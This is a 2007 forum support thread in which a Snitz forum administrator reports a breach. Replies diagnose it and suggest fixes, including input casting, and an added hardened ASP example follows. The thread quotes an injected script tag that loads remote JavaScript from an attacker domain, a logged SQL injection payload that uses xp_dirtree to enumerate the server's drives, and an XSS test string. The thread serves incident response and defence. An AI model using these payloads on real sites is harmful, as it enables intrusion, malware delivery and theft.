gpspassion
Junior Member
260 Posts
Posted - 03 November 2007 : 10:53:29
Just a quick heads up for users of the Snitz forums: I've just been attacked/hacked and as a result this code: <script src="hxxp://yl18.net/0.js"></script> got inserted in at least the following fields:
Forums: F_Description; Members: M_SIG
Apparently that script installs an HTML/Ani virus; I didn't find much about it.
Not sure how that happened, but I did notice a D99_temp table that was created yesterday, which has already been reported here I think, and that lists the contents of the D drive.
It happened a couple of hours ago, so I'm going to be restoring last night's backup, hoping it's clean...
Any thoughts on the problem? Preventing, fixing? Finding out who did it? Would SQL logs help? Not sure where to look.
PS - Actually I'm surprised the forum was able to execute a <script>; is there a way I can prevent that from happening in the future? I guess I could put </script> in the banned word list.
UPDATE - looks like this is a known problem -> http://www.webmasterforums.com/windows-web-security/5612-page-being-hijacked-3.html with a fix, but it seems a bit complex; I will have to read that quietly.
Edited by - gpspassion on 03 November 2007 11:26:31
MarcelG
Retired Support Moderator
Netherlands
2625 Posts
Posted - 03 November 2007 : 12:07:45
How does it end up in F_DESCRIPTION? Only admins can make forums if I'm not mistaken, and only Mods can alter the description...
ruirib
Snitz Forums Admin
Portugal
26364 Posts
Posted - 03 November 2007 : 12:15:24
You will need to have a look at the web server logs to find out how it was done. This may be a Snitz issue or not. I've seen a forum hacked in a similar way, but they got in through another page, not a forum one, so finding out how they got in is essential for you to prevent new hacks.
modifichicci
Average Member
Italy
787 Posts
Posted - 03 November 2007 : 12:25:31
It can happen if an input isn't cleaned of scripting, as in the advanced search mod: the string you are searching for is displayed without sanitisation and it leads to script execution. (Everyone using that mod, check for that!) But you don't have that mod installed and your search page is safe.
You can test your input modules with this simple script: <script>alert('ciao');</script> If there is a hole you will have a message saying "Ciao".
PS, I have seen you have your portal page based on ASP Nuke. Maybe some of this code isn't as safe as it looks..
Edited by - modifichicci on 03 November 2007 12:27:22
gpspassion
Junior Member
260 Posts
Posted - 03 November 2007 : 13:00:34
Thanks all for pitching in.
So here's what they did at first: creation of the D99_Tmp table.
2007-11-02 16:37:41 W3SVC1 xxxxxxxxx GET /fr/news.asp id=707;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"C:\",%201,1-- 80 - 121.33.6.51 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
It seems they're getting in from one of the portal tables, /fr/news.asp - ASP-Nuke, yes.
How they added <script src="hxxp://yl18.net/0.js"></script> after that I don't know, but it's really similar to the problem described here http://www.webmasterforums.com/windows-web-security/5612-page-being-hijacked-3.html - including the nice IP from China... http://www.zoneedit.com/whois.html?zone=121.33.6.51
It seems a quick fix would be to "Fix your initial Database logins to not have dbo or sa access to the DB server. Lock down your DB access." - not sure how to do that though, any pointers?
While I'm at it, does anyone have good recommendations for a firewall? It seems BLACKICE PC Protection Firewall Software has been discontinued. I use the built-in WS2003 firewall for now and can't even seem to block IPs.
PS - BTW, this thread should probably be moved out of public view at some point as it might give ideas...
Edited by - gpspassion on 03 November 2007 13:04:20
ruirib
Snitz Forums Admin
Portugal
26364 Posts
Posted - 03 November 2007 : 13:30:04
The fix is to sanitize the input to news.asp, by doing something similar to the way Snitz handles such situations. For example,
newsID = CLng(Request.QueryString("id"))
Then use newsID whenever you want to use the value passed in the querystring.
Strategies such as these should be used in all pages. This should be enough to protect you against new hacks.
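As an added example (not code from the thread, from Snitz or from ASP-Nuke), here is how news.asp could apply that approach in classic ASP/VBScript: validate the id before converting it, pass the typed value as a query parameter instead of concatenating it into the SQL, and HTML-encode stored text on output. The table and column names (NEWS, N_ID, N_TITLE, N_BODY) and the connection string are assumptions.

```vbscript
<%@ Language="VBScript" %>
<% Option Explicit
' Added example: hardened handler for news.asp?id=... (not the project's own code).
Dim rawId, newsID, cn, cmd, rs

rawId = CStr(Request.QueryString("id"))

' 1. Validate the shape first. CLng("707;DROP TABLE ...") raises a
'    type-mismatch runtime error, which is safe (no SQL runs) but noisy;
'    rejecting the request cleanly is better.
If Not IsWholeNumber(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid news id"
    Response.End
End If
newsID = CLng(rawId)

' 2. Use the typed value as a parameter; it is never part of the SQL text.
Set cn = Server.CreateObject("ADODB.Connection")
cn.Open Application("strConnString")   ' assumed application-level setting
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = cn
cmd.CommandText = "SELECT N_TITLE, N_BODY FROM NEWS WHERE N_ID = ?"
' 3 = adInteger, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , newsID)
Set rs = cmd.Execute

' 3. Encode anything user-supplied on output. This is the same defence the
'    forum needs for F_DESCRIPTION and M_SIG: a stored <script> tag is shown
'    as text instead of being executed by the browser.
If Not rs.EOF Then
    Response.Write "<h1>" & Server.HTMLEncode(rs("N_TITLE")) & "</h1>"
    Response.Write "<div>" & Server.HTMLEncode(rs("N_BODY")) & "</div>"
End If
rs.Close: cn.Close

' Accepts an optional minus sign followed by up to nine digits, e.g. "707".
' Rejects "707;DROP TABLE D99_Tmp" and also forms such as "1e3" or "&H10",
' which IsNumeric alone would let through.
Function IsWholeNumber(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^-?\d{1,9}$"
    IsWholeNumber = re.Test(s)
End Function
%>
```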
Etymon
Advanced Member
United States
2395 Posts
Posted - 03 November 2007 : 15:51:37
newsID = CLng(Request.QueryString("id"))